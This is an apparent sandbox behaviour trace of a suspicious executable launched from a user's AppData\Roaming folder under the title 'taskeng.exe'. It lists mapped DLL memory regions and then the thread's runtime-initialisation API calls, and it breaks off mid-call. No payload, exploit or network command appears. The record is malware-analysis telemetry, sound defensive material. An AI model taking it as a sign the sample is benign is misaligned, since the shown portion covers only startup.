1820 start_va = 0x752c0000 end_va = 0x752fefff monitored = 0 entry_point = 0x752ee088 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 1821 start_va = 0x776e0000 end_va = 0x777fefff monitored = 0 entry_point = 0x776f5340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1822 start_va = 0x769b0000 end_va = 0x76abffff monitored = 0 entry_point = 0x769c3283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1823 start_va = 0x776e0000 end_va = 0x777fefff monitored = 0 entry_point = 0x776f5340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1824 start_va = 0x776e0000 end_va = 0x777fefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000776e0000" filename = "" Region: id = 1825 start_va = 0x775e0000 end_va = 0x776d9fff monitored = 0 entry_point = 0x775fa2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1857 start_va = 0x775e0000 end_va = 0x776d9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000775e0000" filename = "" Region: id = 1858 start_va = 0x4e0000 end_va = 0x77ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 1931 start_va = 0x769b0000 end_va = 0x76abffff monitored = 0 entry_point = 0x769c3283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1932 start_va = 0x76fe0000 end_va = 0x77026fff monitored = 0 entry_point = 0x76fe74c1 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1933 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1934 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 1935 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 1936 start_va = 0x1a0000 end_va = 0x206fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2319 start_va = 0x210000 end_va = 0x29ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 2437 start_va = 0x780000 end_va = 0xb8ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000780000" filename = "" Region: id = 2438 start_va = 0x20000 end_va = 0x21fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 2439 start_va = 0x20000 end_va = 0x21fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 2440 start_va = 0x20000 end_va = 0x28fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2441 start_va = 0x773b0000 end_va = 0x774affff monitored = 0 entry_point = 0x773cb6ed region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 2442 start_va = 0x77240000 end_va = 0x772cffff monitored = 0 entry_point = 0x77256343 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 2443 start_va = 0x75780000 end_va = 0x75789fff monitored = 0 entry_point = 0x757836a0 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 2444 start_va = 0x76ac0000 end_va = 0x76b5cfff monitored = 0 entry_point = 0x76af3fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 2445 start_va = 0x76cc0000 end_va = 0x76d6bfff monitored = 0 entry_point = 0x76cca472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 2446 start_va = 0x76c20000 end_va = 0x76cbffff monitored = 0 entry_point = 0x76c349e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 2447 start_va = 0x76900000 end_va = 0x76918fff monitored = 0 entry_point = 0x76904975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 2448 start_va = 0x75bc0000 end_va = 0x75caffff monitored = 0 entry_point = 0x75bd0569 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 2449 start_va = 0x75530000 end_va = 0x7558ffff monitored = 0 entry_point = 0x7554a3b3 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 2450 start_va = 0x75520000 end_va = 0x7552bfff monitored = 0 entry_point = 0x755210e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 2451 start_va = 0x780000 end_va = 0x93ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000780000" filename = "" Region: id = 2452 start_va = 0x210000 end_va = 0x22dfff monitored = 0 entry_point = 0x22158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 2453 start_va = 0x290000 end_va = 0x29ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 2454 start_va = 0x4e0000 end_va = 0x667fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 2455 start_va = 0x680000 end_va = 0x77ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000680000" filename = "" Region: id = 2456 start_va = 0x210000 end_va = 0x22dfff monitored = 0 entry_point = 0x22158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 2457 start_va = 0x76b90000 end_va = 0x76beffff monitored = 0 entry_point = 0x76ba158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 2458 start_va = 0x774b0000 end_va = 0x7757bfff monitored = 0 entry_point = 0x774b168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 2459 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 2460 start_va = 0x210000 end_va = 0x210fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 2461 start_va = 0x780000 end_va = 0x900fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000780000" filename = "" Region: id = 2462 start_va = 0x930000 end_va = 0x93ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000930000" filename = "" Region: id = 2463 start_va = 0x940000 end_va = 0x1d3ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000940000" filename = "" Region: id = 2464 start_va = 0x74430000 end_va = 0x744affff monitored = 0 entry_point = 0x744437c9 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 2465 start_va = 0x1d40000 end_va = 0x1ecffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001d40000" filename = "" Region: id = 2466 start_va = 0x1d40000 end_va = 0x1e1efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001d40000" filename = "" Region: id = 2467 start_va = 0x1e90000 end_va = 0x1ecffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e90000" filename = "" Region: id = 2468 start_va = 0x743c0000 end_va = 0x743d2fff monitored = 0 entry_point = 0x743c1d3f region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 2469 start_va = 0x220000 end_va = 0x222fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000220000" filename = "" Region: id = 2470 start_va = 0x220000 end_va = 0x220fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000220000" filename = "" Thread: id = 98 os_tid = 0xea4 [0131.973] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff78 | out: lpSystemTimeAsFileTime=0x18ff78*(dwLowDateTime=0x8a5537f0, dwHighDateTime=0x1d7fb6e)) [0131.973] GetCurrentProcessId () returned 0xea0 [0131.973] GetCurrentThreadId () returned 0xea4 [0131.974] GetTickCount () returned 0x1d46c23 [0131.974] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff68 | out: lpPerformanceCount=0x18ff68*=3086232238711) returned 1 [0138.688] GetStartupInfoW (in: lpStartupInfo=0x18ff20 | out: lpStartupInfo=0x18ff20*(cb=0x44, lpReserved="", lpDesktop="winsta0\\default", lpTitle="taskeng.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x81, wShowWindow=0x4, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x18ff80, hStdError=0x42c778)) [0138.688] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0138.688] HeapCreate (flOptions=0x0, dwInitialSize=0x1000, dwMaximumSize=0x0) returned 0x290000 [0138.689] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x769b0000 [0138.689] GetProcAddress (hModule=0x769b0000, lpProcName="FlsAlloc") returned 0x769c4ee3 [0138.689] GetProcAddress (hModule=0x769b0000, lpProcName="FlsGetValue") returned 0x769c1252 [0138.689] GetProcAddress (hModule=0x769b0000, lpProcName="FlsSetValue") returned 0x769c41c0 [0138.689] GetProcAddress (hModule=0x769b0000, lpProcName="FlsFree") returned 0x769c354f [0138.691] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x238) returned 0x2907d0 [0138.692] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x769b0000 [0138.692] GetCurrentThreadId () returned 0xea4 [0138.692] GetStartupInfoW (in: lpStartupInfo=0x18fea8 | out: lpStartupInfo=0x18fea8*(cb=0x44, lpReserved="", lpDesktop="winsta0\\default", lpTitle="taskeng.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x81, wShowWindow=0x4, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x2907f0, hStdOutput=0x429b74, hStdError=0x0)) [0138.692] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x824) returned 0x290a10 [0138.692] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0138.692] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0138.692] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0138.692] SetHandleCount (uNumber=0x20) returned 0x20 [0138.692] GetCommandLineW () returned="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\cdieedr " [0138.692] GetEnvironmentStringsW () returned 0x68ede0* [0141.013] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0xb2e) returned 0x291240 [0141.013] FreeEnvironmentStringsW (penv=0x68ede0) returned 1 [0141.013] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4c5868, nSize=0x104 | out: lpFilename="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\cdieedr" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\cdieedr")) returned 0x2a [0141.013] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x82) returned 0x291d78 [0141.013] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0xbc) returned 0x291e08 [0141.013] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x62) returned 0x291ed0 [0141.014] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x7a) returned 0x291f40 [0141.014] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x92) returned 0x291fc8 [0141.014] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x9c) returned 0x292068 [0141.014] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x86) returned 0x292110 [0141.014] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x54) returned 0x2921a0 [0141.014] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x6c) returned 0x292200 [0141.014] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x4c) returned 0x292278 [0141.014] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x3e) returned 0x2922d0 [0141.014] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x58) returned 0x292318 [0141.015] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x80) returned 0x292378 [0141.015] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x56) returned 0x292400 [0141.015] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x52) returned 0x292460 [0141.015] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x40) returned 0x2924c0 [0141.015] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x14e) returned 0x292508 [0141.015] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0xa0) returned 0x292660 [0141.015] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x5a) returned 0x292708 [0141.015] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x5e) returned 0x292770 [0141.015] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0xb4) returned 0x2927d8 [0141.015] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x48) returned 0x292898 [0141.015] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x54) returned 0x2928e8 [0141.015] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x5a) returned 0x292948 [0141.016] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x6c) returned 0x2929b0 [0141.016] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x76) returned 0x292a28 [0141.016] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x60) returned 0x292aa8 [0141.016] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0xf6) returned 0x292b10 [0141.016] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x52) returned 0x292c10 [0141.016] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x42) returned 0x292c70 [0141.016] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x50) returned 0x292cc0 [0141.016] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x78) returned 0x292d18 [0141.016] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x76) returned 0x292d98 [0141.016] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x50) returned 0x292e18 [0141.016] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x4a) returned 0x292e70 [0141.016] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x62) returned 0x292ec8 [0141.016] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x48) returned 0x292f38 [0141.017] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x54) returned 0x292f88 [0141.017] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0xb0) returned 0x292fe8 [0141.017] HeapValidate (hHeap=0x290000, dwFlags=0x0, lpMem=0x291240) returned 1 [0141.023] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x291240 | out: hHeap=0x290000) returned 1 [0141.024] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0xa4) returned 0x291240 [0141.024] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0141.024] GetLastError () returned 0x0 [0141.024] SetLastError (dwErrCode=0x0) [0141.024] GetLastError () returned 0x0 [0141.024] SetLastError (dwErrCode=0x0) [0141.024] GetLastError () returned 0x0 [0141.024] SetLastError (dwErrCode=0x0) [0141.024] GetACP () returned 0x4e4 [0141.024] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x244) returned 0x2912f0 [0141.024] GetLastError () returned 0x0 [0141.024] SetLastError (dwErrCode=0x0) [0141.024] IsValidCodePage (CodePage=0x4e4) returned 1 [0141.025] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18fe50 | out: lpCPInfo=0x18fe50) returned 1 [0141.025] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f914 | out: lpCPInfo=0x18f914) returned 1 [0141.025] GetLastError () returned 0x0 [0141.025] SetLastError (dwErrCode=0x0) [0141.025] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f92c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0141.025] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x22c) returned 0x291540 [0141.025] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f92c, cbMultiByte=256, lpWideCharStr=0x291568, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ﷽﷽\\\篝ኒ∟) returned 256 [0141.025] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ﷽﷽\\\篝ኒ∟, cchSrc=256, lpCharType=0x18fc34 | out: lpCharType=0x18fc34) returned 1 [0141.025] HeapValidate (hHeap=0x290000, dwFlags=0x0, lpMem=0x291540) returned 1 [0141.026] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x291540 | out: hHeap=0x290000) returned 1 [0141.026] GetLastError () returned 0x0 [0141.026] SetLastError (dwErrCode=0x0) [0141.026] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f92c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0141.026] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x22c) returned 0x291540 [0141.026] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f92c, cbMultiByte=256, lpWideCharStr=0x291568, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ﷽﷽\\\篝ኒ∟) returned 256 [0141.026] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ﷽﷽\\\篝ኒ∟, cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0141.027] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x22c) returned 0x291778 [0141.027] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ﷽﷽\\\ﳝሔ䀌⤕∀, cchSrc=256, lpDestStr=0x2917a0, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ﷽﷽\\\식ራ∟) returned 256 [0141.027] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ﷽﷽\\\식ራ∟, cchWideChar=256, lpMultiByteStr=0x18fb34, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿH\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02h\x02(\x02(\x02(\x02(\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02H\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x10\x02\x10\x02\x10\x02\x10\x02 \x02", lpUsedDefaultChar=0x0) returned 256 [0141.027] HeapValidate (hHeap=0x290000, dwFlags=0x0, lpMem=0x291778) returned 1 [0141.028] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x291778 | out: hHeap=0x290000) returned 1 [0141.028] HeapValidate (hHeap=0x290000, dwFlags=0x0, lpMem=0x291540) returned 1 [0141.028] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x291540 | out: hHeap=0x290000) returned 1 [0141.028] GetLastError () returned 0x0 [0141.028] SetLastError (dwErrCode=0x0) [0141.028] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f92c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0141.028] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x22c) returned 0x291540 [0141.028] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f92c, cbMultiByte=256, lpWideCharStr=0x291568, cchWideChar=256 | out: lpWideCharStr=" 